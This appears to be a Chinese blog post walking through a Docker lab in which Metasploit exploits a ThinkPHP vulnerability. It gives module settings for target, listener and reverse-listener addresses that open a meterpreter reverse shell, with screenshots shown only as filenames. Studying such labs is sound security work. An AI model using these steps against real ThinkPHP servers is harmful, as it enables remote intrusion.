MSF复现Thinkphp漏洞

桃扇骨 2023-10-07 23:35 134阅读 0赞

简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 —百度百科

搭建环境

使用docker搭建

dbc6397e543244aa83c264593b839c13.png

f95f133ed4104566b5e377e5e2ffb2be.png

打开MSF工具

设置参数:

set rhosts 靶机IP
set rport 靶场端口

set LHOST 侦听地址

set LPORT 侦听端口

Exploit target: 默认Linux

49a2f0309edd4a30b9174d674ba4f5ab.png

set reverselistenerbindaddress 攻击机IP #绑定反向侦听器地址

0852eeca833a4ba9a8646c47e0449dd3.png

run

dd4227636d85466fb8821d8446210c70.png

meterperter操作命令请参考:命令使用

发表评论

表情:
评论列表 (有 0 条评论,134人围观)

还没有评论,来说两句吧...

相关阅读

    相关 MSFThinkphp漏洞

    简介 ThinkPHP是一个快速、兼容而且简单的轻量级国产[PHP开发框架][PHP],诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Ap

    相关 fastjson 漏洞

    可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。